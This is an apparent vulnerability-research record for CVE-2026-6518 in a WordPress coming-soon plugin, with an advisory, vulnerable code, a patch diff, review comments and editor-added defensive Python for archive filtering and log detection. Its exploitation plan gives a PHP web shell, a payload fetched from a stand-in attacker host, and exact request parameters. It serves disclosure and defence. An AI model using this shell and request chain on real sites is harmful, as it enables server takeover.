[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f1DvaK4Y747eAWi49A5B-whEoZW2YJMrVngB-y_Xe5Lw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":24,"research_verified":25,"research_rounds_completed":26,"research_plan":27,"research_summary":28,"research_vulnerable_code":29,"research_fix_diff":30,"research_exploit_outline":31,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":25,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":25,"source_links":35},"CVE-2026-6518","cmp-coming-soon-maintenance-plugin-by-niteothemes-missing-authorization-to-authenticated-administrator-arbitrary-file-up","CMP – Coming Soon & Maintenance Plugin by NiteoThemes \u003C= 4.1.16 - Missing Authorization to Authenticated (Administrator+) Arbitrary File Upload and Remote Code Execution","The CMP – Coming Soon & Maintenance Plugin by NiteoThemes plugin for WordPress is vulnerable to arbitrary file upload and remote code execution in all versions up to, and including, 4.1.16 via the `cmp_theme_update_install` AJAX action. This is due to the function only checking for the `publish_pages` capability (available to Editors and above) instead of `manage_options` (Administrators only), combined with a lack of proper validation on the user-supplied file URL and no verification of the downloaded file's content before extraction. 
This makes it possible for authenticated attackers, with Administrator-level access and above, to force the server to download and extract a malicious ZIP file from a remote attacker-controlled URL into a web-accessible directory (`wp-content\u002Fplugins\u002Fcmp-premium-themes\u002F`), resulting in remote code execution. Due to the lack of a nonce for Editors, they are unable to exploit this vulnerability.","cmp-coming-soon-maintenance",null,"\u003C=4.1.16","4.1.17","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-04-17 15:02:18","2026-04-18 03:37:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd6fb275b-dbba-46df-b170-977ef4a84c4c?source=api-prod",1,[22,23],"niteo-cmp.php","readme.txt","researched",false,3,"# Exploitation Research Plan - CVE-2026-6518\n\n## 1. Vulnerability Summary\n**CVE-2026-6518** is a high-severity (CVSS 3.1 score 8.8) missing authorization vulnerability in the **CMP – Coming Soon & Maintenance Plugin** (\u003C= 4.1.16). The `cmp_theme_update_install` AJAX action fails to perform a strict capability check, allowing users with the `publish_pages` capability (Editors) to access it. More significantly, the function permits downloading a ZIP file from an arbitrary user-supplied URL and extracting its contents into the `wp-content\u002Fplugins\u002Fcmp-premium-themes\u002F` directory without validating the file types or content. This allows an authenticated attacker (specifically Administrators, as they are the ones provided with the necessary nonce) to achieve Remote Code Execution (RCE) by uploading a malicious PHP shell.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `cmp_theme_update_install`\n- **Vulnerable Parameters**: `file[url]` (the source URL of the malicious ZIP, passed unvalidated to `download_url()`) and `file[name]` (the directory name created under the premium-themes directory for extraction; not sanitized in 4.1.16).\n- **Authentication**: Authenticated. The handler checks `current_user_can('publish_pages')` (Editor+), but the nonce it verifies is only localized on the plugin's admin settings pages, which are reachable by **Administrators** only, so Editors cannot obtain it.\n- **Preconditions**: The plugin must be active. The server must be able to make outbound HTTP requests to fetch the attacker's ZIP file.\n\n## 3. Code Flow\n1. **Entry**: The `cmp_theme_update_install($file)` method in `niteo-cmp.php` serves both the AJAX request (`$_POST['file']` set) and a direct call with a `$file` array.\n2. **Nonce Verification**: On the AJAX path the handler calls `check_ajax_referer('cmp-coming-soon-ajax-secret', 'security')`, so the nonce for action `cmp-coming-soon-ajax-secret` must be sent in the `security` parameter.\n3. **Authorization Check**: It then checks `current_user_can('publish_pages')` and dies otherwise. This is the missing-authorization bug: `publish_pages` is held by Editors, not only Administrators; 4.1.17 changes the check to `manage_options`.\n4. **Download**: `$file['url']` is passed straight to `download_url()`; no host allowlist or URL validation is applied.\n5. **Extraction**: `unzip_file()` extracts the downloaded archive into `CMP_PREMIUM_THEMES_DIR . $file['name']`; neither the archive entries nor `$file['name']` are checked.\n6. **Sink**: `CMP_PREMIUM_THEMES_DIR` resolves to `wp-content\u002Fplugins\u002Fcmp-premium-themes\u002F`, which is web-accessible, so any PHP file in the archive can be requested and executed directly.\n\n## 4. Nonce Acquisition Strategy\nThe nonce for action `cmp-coming-soon-ajax-secret` is localized into the WordPress admin dashboard for Administrators. The name of the JavaScript object it is attached to is not visible in the excerpted code, so it has to be located in the settings page source.\n\n1. **Authentication**: Log in as an Administrator.\n2. **Navigation**: Navigate to the CMP settings page: `\u002Fwp-admin\u002Fadmin.php?page=cmp-settings`.\n3. 
**Extraction**: Retrieve the nonce from the settings page: search the rendered page source, or the global JavaScript scope via `browser_eval`, for the value localized for the `cmp-coming-soon-ajax-secret` action.\n4. **Verification**: Confirm the value is a 10-character WordPress nonce. A stale or wrong nonce makes `check_ajax_referer()` terminate the request with `-1` before the capability check runs, so a `-1` response means the nonce, not the privilege level, is the problem.\n\n## 5. Exploitation Strategy\n### Step 1: Prepare Malicious Payload\nCreate a ZIP file named `rce.zip` containing a simple PHP backdoor named `shell.php`:\n```php\n\u003C?php system($_GET['cmd']); ?>\n```\nHost this file on an attacker-controlled server (e.g., `http:\u002F\u002Fattacker.com\u002Frce.zip`).\n\n### Step 2: Acquire Nonce\nNavigate to the CMP settings page as an Administrator and extract the nonce as described in section 4.\n\n### Step 3: Trigger Arbitrary File Upload\nSend a POST request to `admin-ajax.php` to force the server to download and extract the ZIP. The handler reads a `file` array from `$_POST`, so the parameters are sent in PHP array notation.\n\n- **URL**: `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Parameters**:\n    - `action`: `cmp_theme_update_install`\n    - `file[name]`: `pwned`\n    - `file[url]`: `http:\u002F\u002Fattacker.com\u002Frce.zip`\n    - `security`: `[EXTRACTED_NONCE]`\n\n### Step 4: Execute Remote Code\nThe file will be extracted to `wp-content\u002Fplugins\u002Fcmp-premium-themes\u002Fpwned\u002Fshell.php`.\nAccess the shell to confirm RCE:\n- **URL**: `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-content\u002Fplugins\u002Fcmp-premium-themes\u002Fpwned\u002Fshell.php?cmd=id`\n\n## 6. Test Data Setup\n1. **Plugin Installation**: Install and activate `cmp-coming-soon-maintenance` version 4.1.16.\n2. **User Creation**: Ensure an Administrator user exists.\n3. **External Host**: Prepare a local listener or mock server to host the `rce.zip`.\n\n## 7. 
Expected Results\n- The HTTP response body is not a reliable success signal: the success path of the 4.1.16 handler is not shown in the excerpt, while failures surface as `-1` (nonce) or `Sorry, but this request is invalid` (capability). Confirm on the file system instead.\n- A new directory `wp-content\u002Fplugins\u002Fcmp-premium-themes\u002Fpwned\u002F` should be created.\n- Requesting the shell should return the output of the `id` command.\n\n## 8. Verification Steps\n1. **File System Check**: On the server, verify the file exists (the document root `\u002Fvar\u002Fwww\u002Fhtml` is assumed):\n   ```bash\n   ls -la \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcmp-premium-themes\u002Fpwned\u002Fshell.php\n   ```\n2. **Content Check**: Verify the content of the uploaded file matches the payload:\n   ```bash\n   cat \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcmp-premium-themes\u002Fpwned\u002Fshell.php\n   ```\n\n## 9. Alternative Approaches\n- **Directory Traversal**: In 4.1.16 `file[name]` is concatenated onto `CMP_PREMIUM_THEMES_DIR` without sanitization, so a value containing `..\u002F` would place the extracted files outside the `cmp-premium-themes` directory. This is only worth testing if the dedicated folder turns out not to be web-accessible; 4.1.17 closes it with `sanitize_key()` and a check against the installed premium themes.\n- **Outbound access blocked**: If the server cannot reach the attacker's host, `download_url()` returns a `WP_Error` and nothing is extracted. The vulnerable handler has no local-file fallback, so the download has to succeed.","The CMP plugin is vulnerable to arbitrary file upload and remote code execution via the `cmp_theme_update_install` AJAX action. 
This occurs because the plugin lacks sufficient authorization checks (using 'publish_pages' instead of 'manage_options') and fails to validate the source URL or contents of downloaded ZIP files, allowing attackers to upload PHP shells to a web-accessible directory.","\u002F\u002F niteo-cmp.php lines 1413-1463\npublic function cmp_theme_update_install($file)\n{\n    $ajax = false;\n    \u002F\u002F check for ajax \n    if (isset($_POST['file'])) {\n        \u002F\u002F verify nonce\n        check_ajax_referer('cmp-coming-soon-ajax-secret', 'security');\n        \u002F\u002F verify user rights\n        if (!current_user_can('publish_pages')) {\n            die('Sorry, but this request is invalid');\n        }\n\n        $file = $_POST['file'];\n\n        if (!empty($_POST['file'])) {\n            $file = $_POST['file'];\n            $ajax   = true;\n        }\n    }\n\n    \u002F\u002F load PHP WP FILE \n    if (!empty($file)) {\n        \u002F\u002F Download file to temp location.\n        $file['tmp_name'] = download_url($file['url']);\n        \u002F\u002FWARNING: The file is not automatically deleted, The script must unlink() the file.\n\n        \u002F\u002F If error storing temporarily, return the error.\n        if (!is_wp_error($file['tmp_name'])) {\n            WP_Filesystem();\n\n            \u002F\u002F create new theme DIR\n            $path = CMP_PREMIUM_THEMES_DIR . 
$file['name'];\n\n            \u002F\u002F unzip theme file\n            $unzipfile = unzip_file($file['tmp_name'], $path);","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fcmp-coming-soon-maintenance\u002F4.1.16\u002Fniteo-cmp.php\t2025-12-02 19:54:58.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fcmp-coming-soon-maintenance\u002F4.1.17\u002Fniteo-cmp.php\t2026-04-07 20:05:50.000000000 +0000\n@@ -1242,7 +1242,7 @@\n \t\t\t\t\u002F\u002F verify nonce\n \t\t\t\tcheck_ajax_referer('cmp-coming-soon-ajax-secret', 'security');\n \t\t\t\t\u002F\u002F verify user rights\n-\t\t\t\tif (!current_user_can('publish_pages')) {\n+\t\t\t\tif (!current_user_can('manage_options')) {\n \t\t\t\t\tdie('Sorry, but this request is invalid');\n \t\t\t\t}\n \n@@ -1413,12 +1413,13 @@\n \t\tpublic function cmp_theme_update_install($file)\n \t\t{\n \t\t\t$ajax = false;\n+\t\t\t$theme_slug = '';\n \t\t\t\u002F\u002F check for ajax \n \t\t\tif (isset($_POST['file'])) {\n \t\t\t\t\u002F\u002F verify nonce\n \t\t\t\tcheck_ajax_referer('cmp-coming-soon-ajax-secret', 'security');\n \t\t\t\t\u002F\u002F verify user rights\n-\t\t\t\tif (!current_user_can('publish_pages')) {\n+\t\t\t\tif (!current_user_can('manage_options')) {\n \t\t\t\t\tdie('Sorry, but this request is invalid');\n \t\t\t\t}\n \n@@ -1427,18 +1428,73 @@\n \n \t\t\t\tif (!empty($_POST['file'])) {\n \t\t\t\t\t$file = $_POST['file'];\n+\t\t\t\t\t$theme_slug = isset($file['name']) ? sanitize_key($file['name']) : '';\n \t\t\t\t\t$ajax   = true;\n \t\t\t\t}\n+\t\t\t} else if (is_array($file) && isset($file['name'])) {\n+\t\t\t\t$theme_slug = sanitize_key($file['name']);\n \t\t\t}\n \n \t\t\t\u002F\u002F load PHP WP FILE \n \t\t\tif (!empty($file)) {\n+\t\t\t\tif ($theme_slug === '' || !in_array($theme_slug, $this->cmp_premium_themes_installed(), true)) {\n+\t\t\t\t\techo '\u003Cdiv class=\"notice notice-error is-dismissible\">\u003Cp>' . 
__('Invalid theme update request.', 'cmp-coming-soon-maintenance') . '\u003C\u002Fp>\u003C\u002Fdiv>';\n+\t\t\t\t\tif ($ajax === true) {\n+\t\t\t\t\t\twp_die('error');\n+\t\t\t\t\t\treturn;\n+\t\t\t\t\t}\n+\t\t\t\t\treturn;\n+\t\t\t\t}\n+\n+\t\t\t\t$allowed_hosts = array(wp_parse_url(CMP_UPDATE_URL, PHP_URL_HOST));\n+\t\t\t\t$file['url'] = add_query_arg(array('action' => 'download', 'slug' => $theme_slug), CMP_UPDATE_URL);\n+\t\t\t\t$parsed_url = wp_parse_url($file['url']);\n+\n+\t\t\t\tif (empty($parsed_url['host']) || !in_array($parsed_url['host'], $allowed_hosts, true)) {\n+\t\t\t\t\techo '\u003Cdiv class=\"notice notice-error is-dismissible\">\u003Cp>' . __('Invalid update URL.', 'cmp-coming-soon-maintenance') . '\u003C\u002Fp>\u003C\u002Fdiv>';\n+\t\t\t\t\tif ($ajax === true) {\n+\t\t\t\t\t\twp_die('error');\n+\t\t\t\t\t\treturn;\n+\t\t\t\t\t}\n+\t\t\t\t\treturn;\n+\t\t\t\t}\n+\n+\t\t\t\t$file['name'] = $theme_slug;\n+\n \t\t\t\t\u002F\u002F Download file to temp location.\n \t\t\t\t$file['tmp_name'] = download_url($file['url']);\n \t\t\t\t\u002F\u002FWARNING: The file is not automatically deleted, The script must unlink() the file.\n \n \t\t\t\t\u002F\u002F If error storing temporarily, return the error.\n \t\t\t\tif (!is_wp_error($file['tmp_name'])) {\n+\t\t\t\t\tif (!class_exists('ZipArchive')) {\n+\t\t\t\t\t\twp_delete_file($file['tmp_name']);\n+\t\t\t\t\t\techo '\u003Cdiv class=\"notice notice-error is-dismissible\">\u003Cp>' . __('ZIP validation is unavailable on this server.', 'cmp-coming-soon-maintenance') . 
'\u003C\u002Fp>\u003C\u002Fdiv>';\n+\t\t\t\t\t\tif ($ajax === true) {\n+\t\t\t\t\t\t\twp_die('error');\n+\t\t\t\t\t\t\treturn;\n+\t\t\t\t\t\t}\n+\t\t\t\t\t\treturn;\n+\t\t\t\t\t}\n+\n+\t\t\t\t\t$zip = new ZipArchive();\n+\t\t\t\t\tif ($zip->open($file['tmp_name']) === TRUE) {\n+\t\t\t\t\t\tfor ($i = 0; $i \u003C $zip->numFiles; $i++) {\n+\t\t\t\t\t\t\t$entry = $zip->getNameIndex($i);\n+\t\t\t\t\t\t\tif (preg_match('\u002F\\.(php|phtml|phar)$\u002Fi', $entry)) {\n+\t\t\t\t\t\t\t\t$zip->close();\n+\t\t\t\t\t\t\t\twp_delete_file($file['tmp_name']);\n+\t\t\t\t\t\t\t\techo '\u003Cdiv class=\"notice notice-error is-dismissible\">\u003Cp>' . __('ZIP contains forbidden file types.', 'cmp-coming-soon-maintenance') . '\u003C\u002Fp>\u003C\u002Fdiv>';\n+\t\t\t\t\t\t\t\tif ($ajax === true) {\n+\t\t\t\t\t\t\t\t\twp_die('error');\n+\t\t\t\t\t\t\t\t\treturn;\n+\t\t\t\t\t\t\t\t}\n+\t\t\t\t\t\t\t\treturn;\n+\t\t\t\t\t\t\t}\n+\t\t\t\t\t\t}\n+\t\t\t\t\t\t$zip->close();\n+\t\t\t\t\t}\n+\n \t\t\t\t\tWP_Filesystem();\n \n \t\t\t\t\t\u002F\u002F create new theme DIR","1. Prepare a malicious ZIP file containing a PHP web shell (e.g., shell.php) and host it on an attacker-controlled server.\n2. Authenticate as an Administrator on the target WordPress site.\n3. Navigate to the CMP settings page (`\u002Fwp-admin\u002Fadmin.php?page=cmp-settings`) to retrieve the AJAX nonce localized as `cmp-coming-soon-ajax-secret` (usually found in the `cmp_ajax` or `cmp_params` JS object).\n4. Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n   - `action`: `cmp_theme_update_install`\n   - `security`: [EXTRACTED_NONCE]\n   - `file[url]`: [URL_TO_MALICIOUS_ZIP]\n   - `file[name]`: [DESIRED_DIRECTORY_NAME]\n5. The plugin will download the ZIP and extract its contents into `wp-content\u002Fplugins\u002Fcmp-premium-themes\u002F[DESIRED_DIRECTORY_NAME]\u002F`.\n6. 
Access the uploaded shell directly via its web-accessible path to execute arbitrary commands.","gemini-3-flash-preview","2026-04-20 13:16:10","2026-04-20 13:16:59",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","4.1.16","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcmp-coming-soon-maintenance\u002Ftags\u002F4.1.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcmp-coming-soon-maintenance.4.1.16.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcmp-coming-soon-maintenance\u002Ftags\u002F4.1.17","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcmp-coming-soon-maintenance.4.1.17.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcmp-coming-soon-maintenance\u002Ftags"]
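Review bot: In the @@ -1413,12 +1413,13 @@ hunk of the niteo-cmp.php 4.1.16 to 4.1.17 diff, the nonce and capability checks still sit inside the `if (isset($_POST['file']))` branch, so the new `} else if (is_array($file) && isset($file['name'])) {` path added in the next hunk performs no authorization of its own and relies entirely on its caller; a docblock on `cmp_theme_update_install($file)` stating that the direct-call path must only be reached from already-authorized admin code would make that contract explicit for the next reader.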
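Review bot: The @@ -1427,18 +1428,73 @@ hunk screens archive entries with `preg_match('/\.(php|phtml|phar)$/i', $entry)`, a denylist, so an entry such as `.htaccess`, `.user.ini`, or PHP source under any other extension a host maps to the PHP handler still extracts into a web-served directory; an allowlist of the asset extensions a theme package needs, plus rejection of dotfiles and of any entry whose normalized path leaves the target directory, would close that gap. In the same hunk, when `$zip->open($file['tmp_name']) === TRUE` is false the code falls through to `WP_Filesystem();` and `unzip_file()` on an archive it could not inspect; treat an open failure like the `!class_exists('ZipArchive')` case (call `wp_delete_file($file['tmp_name'])` and return). Minor: since `$file['url']` is now rebuilt from `CMP_UPDATE_URL` and `$theme_slug` before the `$allowed_hosts` comparison, that comparison can only fail if `CMP_UPDATE_URL` itself is malformed; a one-line comment saying the user-supplied URL is intentionally discarded would stop readers from hunting for a bypass there.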
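Added example, written by the editor and not code from the CMP plugin, Wordfence, or the research record above. The advisory's point is that 4.1.16 hands the downloaded archive to `unzip_file()` with no inspection of its entries, and the 4.1.17 diff adds an extension denylist (`.php`, `.phtml`, `.phar`). The Python below builds a constructed archive in memory and runs each entry through a mirror of that denylist and through the allowlist-plus-path check a hardened handler would use; the allowlisted extensions and the sample entry names are assumptions, not anything taken from the plugin.

```python
"""Added example (not code from the CMP plugin or the page's author).

Compares two entry filters over a constructed ZIP archive:
  rejected_by_patch     - mirrors the .php/.phtml/.phar denylist added in 4.1.17
  rejected_by_allowlist - allowlist of asset extensions plus path and dotfile checks
"""
import io
import posixpath
import re
import zipfile

# Mirror of the 4.1.17 denylist regex (case-insensitive).
PATCH_DENYLIST = re.compile(r"\.(php|phtml|phar)$", re.IGNORECASE)

# Assumption: the asset types a coming-soon theme package legitimately needs.
THEME_ALLOWLIST = {"css", "js", "png", "jpg", "jpeg", "gif", "svg",
                   "woff", "woff2", "json", "txt", "md"}


def rejected_by_patch(entry: str) -> bool:
    """True if the 4.1.17 ZipArchive scan would refuse this entry name."""
    return PATCH_DENYLIST.search(entry) is not None


def rejected_by_allowlist(entry: str) -> bool:
    """True unless the entry is a plain file, inside the target directory,
    not a dotfile, and carrying an allowlisted extension."""
    if entry.endswith("/"):
        return False                      # directory entry, carries no content
    if "\\" in entry or entry.startswith("/"):
        return True                       # absolute path or backslash separators
    norm = posixpath.normpath(entry)
    if norm == ".." or norm.startswith("../"):
        return True                       # escapes the extraction directory
    base = posixpath.basename(norm)
    if base.startswith("."):
        return True                       # .htaccess, .user.ini and friends
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    return ext not in THEME_ALLOWLIST


def build_sample_zip() -> bytes:
    """Constructed archive: one legitimate asset plus common bypass candidates."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("style.css", "body{}")
        zf.writestr("shell.php", "<?php system($_GET['cmd']); ?>")
        zf.writestr("Shell.PHP", "<?php ?>")                 # case variant
        zf.writestr("shell.php5", "<?php ?>")                # handler-mapped on some hosts
        zf.writestr(".htaccess", "AddType application/x-httpd-php .css")
        zf.writestr("../outside.txt", "x")                   # path traversal
    return buf.getvalue()


def audit(zip_bytes: bytes) -> dict:
    """Map each entry name to (rejected_by_patch, rejected_by_allowlist)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {name: (rejected_by_patch(name), rejected_by_allowlist(name))
                for name in zf.namelist()}


def archive_is_safe(zip_bytes: bytes) -> bool:
    """Hardened decision: extract only if every entry passes the allowlist."""
    return not any(allow for _, allow in audit(zip_bytes).values())


if __name__ == "__main__":
    for name, (patch, allow) in audit(build_sample_zip()).items():
        print(f"{name:<18} patch_rejects={patch!s:<5} allowlist_rejects={allow}")
```

Running it shows the denylist catching only the two `.php` spellings while the allowlist also stops `shell.php5`, `.htaccess` and the traversal entry; the point is not the exact extension list but that a handler extracting into a web-served path should decide what may go in rather than what may not.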
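Added example, editor's code rather than anything from the page or the plugin: the detection side of the exploit outline. The AJAX action name travels in the POST body, so a web server access log cannot show `cmp_theme_update_install` directly; what it does show is the follow-up request for a script under `wp-content/plugins/cmp-premium-themes/`, the sink the advisory names. The Python below parses combined-format lines (a constructed sample, not real traffic), flags any request for a PHP-family file under that directory, and records whether the same client POSTed to `admin-ajax.php` in the preceding ten minutes; the window length, the log format and the sample addresses are assumptions.

```python
"""Added example (not from the CMP plugin or the page's author): flag requests
that fit the post-exploitation step of CVE-2026-6518 in a combined-format
access log. Sample lines are constructed, not real traffic."""
import re
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
# A PHP-family file requested from the directory the vulnerable handler extracts into.
SINK_RE = re.compile(
    r'^/wp-content/plugins/cmp-premium-themes/.+\.(php|phtml|phar)(\?|$)', re.IGNORECASE
)
AJAX_PATH = "/wp-admin/admin-ajax.php"
WINDOW = timedelta(minutes=10)   # assumption: how far back to look for the AJAX POST

# Constructed sample: one full attack chain from 203.0.113.7, one probe from 198.51.100.4.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Apr/2026:10:01:02 +0000] "GET /wp-admin/admin.php?page=cmp-settings HTTP/1.1" 200 5123
203.0.113.7 - - [18/Apr/2026:10:01:15 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 64
203.0.113.7 - - [18/Apr/2026:10:01:20 +0000] "GET /wp-content/plugins/cmp-premium-themes/pwned/shell.php?cmd=id HTTP/1.1" 200 57
198.51.100.4 - - [18/Apr/2026:10:05:00 +0000] "GET /wp-content/plugins/cmp-premium-themes/cmp-dark/style.css HTTP/1.1" 200 2210
198.51.100.4 - - [18/Apr/2026:10:06:00 +0000] "GET /wp-content/plugins/cmp-premium-themes/cmp-dark/index.PHP HTTP/1.1" 404 231
"""


def parse_line(line: str):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_sink_hits(log_text: str) -> list:
    """Return (ip, path, status, preceded_by_ajax_post) for every request
    that targets a script under cmp-premium-themes, in log order."""
    events = [r for r in map(parse_line, log_text.splitlines()) if r]
    hits = []
    for i, ev in enumerate(events):
        if not SINK_RE.match(ev["path"]):
            continue
        preceded = any(
            p["ip"] == ev["ip"] and p["method"] == "POST"
            and p["path"].split("?", 1)[0] == AJAX_PATH
            and timedelta(0) <= ev["ts"] - p["ts"] <= WINDOW
            for p in events[:i]
        )
        hits.append((ev["ip"], ev["path"], ev["status"], preceded))
    return hits


def classify(hit) -> str:
    """Triage label: a served script (2xx) after an AJAX POST is the full chain;
    a served script alone still means PHP exists where only theme assets belong."""
    _, _, status, preceded = hit
    if 200 <= status < 300:
        return "confirmed-chain" if preceded else "webshell-served"
    return "probe"


if __name__ == "__main__":
    for hit in find_sink_hits(SAMPLE_LOG):
        print(classify(hit), *hit)
```

Any 2xx for a `.php` file under that directory is worth a file-system check regardless of the AJAX correlation, since the legitimate theme packages consist of assets; the correlation only raises confidence and helps attribute the upload to a session.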